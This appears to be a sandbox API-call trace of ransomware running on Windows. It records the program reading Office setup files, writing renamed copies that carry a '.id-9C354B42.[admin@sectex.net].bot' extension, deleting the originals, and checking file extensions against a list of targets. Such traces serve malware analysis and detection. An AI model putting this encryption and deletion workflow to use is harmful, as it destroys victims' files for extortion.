	[0036.891] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0036.891] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\setup.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0036.892] GetLastError () returned 0x0
	[0036.892] ReadFile (in: hFile=0x1bc, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x73c, lpOverlapped=0x0) returned 1
	[0036.901] WriteFile (in: hFile=0x1a0, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x740, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x740, lpOverlapped=0x0) returned 1
	[0036.902] ReadFile (in: hFile=0x1bc, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0036.902] WriteFile (in: hFile=0x1a0, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0036.902] SetEndOfFile (hFile=0x1a0) returned 1
	[0036.902] CloseHandle (hObject=0x1a0) returned 1
	[0036.903] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0036.903] SetEndOfFile (hFile=0x1bc) returned 1
	[0036.903] CloseHandle (hObject=0x1bc) returned 1
	[0036.903] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0036.904] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\setup.xml")) returned 1
	[0036.904] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104
	[0036.904] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104
	[0036.904] lstrlenW (lpString=".doc") returned 4
	[0036.904] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0036.904] lstrlenW (lpString=".docx") returned 5
	[0036.904] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1
	[0036.904] lstrlenW (lpString=".pdf") returned 4
	[0036.904] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0036.904] lstrlenW (lpString=".xls") returned 4
	[0036.904] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0036.904] lstrlenW (lpString=".xlsx") returned 5
	[0036.904] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1
	[0036.904] lstrlenW (lpString=".ppt") returned 4
	[0036.904] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0036.904] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104
	[0036.904] lstrlenW (lpString=".zip") returned 4
	[0036.904] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0036.904] lstrlenW (lpString=".rar") returned 4
	[0036.904] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0036.904] lstrlenW (lpString=".bz2") returned 4
	[0036.904] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0036.904] lstrlenW (lpString=".7z") returned 3
	[0036.905] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0036.905] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104
	[0036.905] lstrlenW (lpString=".dbf") returned 4
	[0036.905] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0036.905] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104
	[0036.905] lstrlenW (lpString=".1cd") returned 4
	[0036.905] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0036.905] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104
	[0036.905] lstrlenW (lpString=".jpg") returned 4
	[0036.905] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0036.905] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104
	[0036.905] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104
	[0036.905] lstrlenW (lpString=".doc") returned 4
	[0036.905] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0036.905] lstrlenW (lpString=".docx") returned 5
	[0036.905] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1
	[0036.905] lstrlenW (lpString=".pdf") returned 4
	[0036.905] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0036.905] lstrlenW (lpString=".xls") returned 4
	[0036.905] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0036.905] lstrlenW (lpString=".xlsx") returned 5
	[0036.905] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1
	[0036.905] lstrlenW (lpString=".ppt") returned 4
	[0036.905] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0036.905] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104
	[0036.905] lstrlenW (lpString=".zip") returned 4
	[0036.905] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0036.905] lstrlenW (lpString=".rar") returned 4
	[0036.905] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0036.905] lstrlenW (lpString=".bz2") returned 4
	[0036.905] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0036.905] lstrlenW (lpString=".7z") returned 3
	[0036.905] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0036.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104
	[0036.906] lstrlenW (lpString=".dbf") returned 4
	[0036.906] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0036.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104
	[0036.906] lstrlenW (lpString=".1cd") returned 4
	[0036.906] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0036.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104
	[0036.906] lstrlenW (lpString=".jpg") returned 4
	[0036.906] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0036.906] lstrcmpiW (lpString1=".CHM", lpString2=".bot") returned 1
	[0036.906] lstrlenW (lpString="OCT.CHM") returned 7
	[0036.906] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\oct.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0
	[0037.748] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=71236) returned 1
	[0037.748] CloseHandle (hObject=0x1c0) returned 1
	[0037.748] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\oct.chm")) returned 0x20
	[0037.748] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\oct.chm.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0037.749] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\oct.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0
	[0037.749] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0037.749] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0037.749] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\oct.chm.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0037.749] GetLastError () returned 0x0
	[0037.749] ReadFile (in: hFile=0x1c0, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x11644, lpOverlapped=0x0) returned 1
	[0037.752] WriteFile (in: hFile=0x1b4, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x11650, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x11650, lpOverlapped=0x0) returned 1
	[0037.753] ReadFile (in: hFile=0x1c0, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0037.753] WriteFile (in: hFile=0x1b4, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xe2, lpOverlapped=0x0) returned 1
	[0037.754] SetEndOfFile (hFile=0x1b4) returned 1
	[0037.754] CloseHandle (hObject=0x1b4) returned 1
	[0037.755] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0037.755] SetEndOfFile (hFile=0x1c0) returned 1
	[0037.756] CloseHandle (hObject=0x1c0) returned 1
	[0037.756] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0037.757] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\oct.chm")) returned 1
	[0037.757] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100
	[0037.757] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100
	[0037.757] lstrlenW (lpString=".doc") returned 4
	[0037.757] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1
	[0037.757] lstrlenW (lpString=".docx") returned 5
	[0037.757] lstrcmpiW (lpString1=".docx", lpString2="T.CHM") returned -1
	[0037.757] lstrlenW (lpString=".pdf") returned 4
	[0037.757] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1
	[0037.757] lstrlenW (lpString=".xls") returned 4
	[0037.757] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1
	[0037.757] lstrlenW (lpString=".xlsx") returned 5
	[0037.757] lstrcmpiW (lpString1=".xlsx", lpString2="T.CHM") returned -1
	[0037.757] lstrlenW (lpString=".ppt") returned 4
	[0037.757] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1
	[0037.757] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100
	[0037.757] lstrlenW (lpString=".zip") returned 4
	[0037.757] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1
	[0037.757] lstrlenW (lpString=".rar") returned 4
	[0037.757] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1
	[0037.757] lstrlenW (lpString=".bz2") returned 4
	[0037.757] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1
	[0037.757] lstrlenW (lpString=".7z") returned 3
	[0037.757] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1
	[0037.758] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100
	[0037.758] lstrlenW (lpString=".dbf") returned 4
	[0037.758] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1
	[0037.758] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100
	[0037.758] lstrlenW (lpString=".1cd") returned 4
	[0037.758] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1
	[0037.758] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100
	[0037.758] lstrlenW (lpString=".jpg") returned 4
	[0037.758] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1
	[0037.758] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100
	[0037.758] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100
	[0037.758] lstrlenW (lpString=".doc") returned 4
	[0037.758] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1
	[0037.758] lstrlenW (lpString=".docx") returned 5
	[0037.758] lstrcmpiW (lpString1=".docx", lpString2="T.CHM") returned -1
	[0037.758] lstrlenW (lpString=".pdf") returned 4
	[0037.758] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1
	[0037.758] lstrlenW (lpString=".xls") returned 4
	[0037.758] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1
	[0037.758] lstrlenW (lpString=".xlsx") returned 5
	[0037.758] lstrcmpiW (lpString1=".xlsx", lpString2="T.CHM") returned -1
	[0037.758] lstrlenW (lpString=".ppt") returned 4
	[0037.758] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1
	[0037.758] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100
	[0037.758] lstrlenW (lpString=".zip") returned 4
	[0037.758] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1
	[0037.759] lstrlenW (lpString=".rar") returned 4
	[0037.759] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1
	[0037.759] lstrlenW (lpString=".bz2") returned 4
	[0037.759] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1
	[0037.759] lstrlenW (lpString=".7z") returned 3
	[0037.759] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1
	[0037.759] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100
	[0037.759] lstrlenW (lpString=".dbf") returned 4
	[0037.759] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1
	[0037.759] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100
	[0037.759] lstrlenW (lpString=".1cd") returned 4
	[0037.759] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1
	[0037.759] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 100
	[0037.759] lstrlenW (lpString=".jpg") returned 4
	[0037.759] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1
	[0037.759] lstrcmpiW (lpString1=".XML", lpString2=".bot") returned 1
	[0037.759] lstrlenW (lpString="OfficeMUI.XML") returned 13
	[0037.759] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0037.760] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=5557) returned 1
	[0037.760] CloseHandle (hObject=0x1b0) returned 1
	[0037.760] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemui.xml")) returned 0x20
	[0037.760] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemui.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0037.760] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0037.760] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0037.761] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0037.761] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemui.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0
	[0037.761] GetLastError () returned 0x0
	[0037.761] ReadFile (in: hFile=0x1b0, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x15b5, lpOverlapped=0x0) returned 1
	[0037.762] WriteFile (in: hFile=0x1c0, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x15c0, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x15c0, lpOverlapped=0x0) returned 1
	[0037.763] ReadFile (in: hFile=0x1b0, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0037.763] WriteFile (in: hFile=0x1c0, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xee, lpOverlapped=0x0) returned 1
	[0037.763] SetEndOfFile (hFile=0x1c0) returned 1
	[0037.763] CloseHandle (hObject=0x1c0) returned 1
	[0037.764] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0037.764] SetEndOfFile (hFile=0x1b0) returned 1
	[0037.765] CloseHandle (hObject=0x1b0) returned 1
	[0037.765] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0037.765] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemui.xml")) returned 1
	[0037.766] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106
	[0037.766] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106
	[0037.766] lstrlenW (lpString=".doc") returned 4
	[0037.766] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0037.766] lstrlenW (lpString=".docx") returned 5
	[0037.766] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1
	[0037.766] lstrlenW (lpString=".pdf") returned 4
	[0037.766] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0037.766] lstrlenW (lpString=".xls") returned 4
	[0037.766] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0037.766] lstrlenW (lpString=".xlsx") returned 5
	[0037.766] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1
	[0037.766] lstrlenW (lpString=".ppt") returned 4
	[0037.766] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0037.766] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106
	[0037.766] lstrlenW (lpString=".zip") returned 4
	[0037.766] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0037.766] lstrlenW (lpString=".rar") returned 4
	[0037.766] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0037.766] lstrlenW (lpString=".bz2") returned 4
	[0037.766] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0037.766] lstrlenW (lpString=".7z") returned 3
	[0037.766] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0037.766] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106
	[0037.766] lstrlenW (lpString=".dbf") returned 4
	[0037.766] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0037.766] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106
	[0037.766] lstrlenW (lpString=".1cd") returned 4
	[0037.766] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0037.766] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106
	[0037.766] lstrlenW (lpString=".jpg") returned 4
	[0037.766] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0037.767] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106
	[0037.767] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106
	[0037.767] lstrlenW (lpString=".doc") returned 4
	[0037.767] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0037.767] lstrlenW (lpString=".docx") returned 5
	[0037.767] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1
	[0037.767] lstrlenW (lpString=".pdf") returned 4
	[0037.767] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0037.767] lstrlenW (lpString=".xls") returned 4
	[0037.767] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0037.767] lstrlenW (lpString=".xlsx") returned 5
	[0037.767] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1
	[0037.767] lstrlenW (lpString=".ppt") returned 4
	[0037.767] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0037.767] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106
	[0037.767] lstrlenW (lpString=".zip") returned 4
	[0037.767] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0037.767] lstrlenW (lpString=".rar") returned 4
	[0037.767] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0037.767] lstrlenW (lpString=".bz2") returned 4
	[0037.767] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0037.767] lstrlenW (lpString=".7z") returned 3
	[0037.767] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0037.767] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106
	[0037.767] lstrlenW (lpString=".dbf") returned 4
	[0037.767] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0037.767] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106
	[0037.767] lstrlenW (lpString=".1cd") returned 4
	[0037.767] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0037.767] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 106
	[0037.767] lstrlenW (lpString=".jpg") returned 4
	[0037.767] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0037.768] lstrcmpiW (lpString1=".XML", lpString2=".bot") returned 1
	[0037.768] lstrlenW (lpString="OfficeMUISet.XML") returned 16
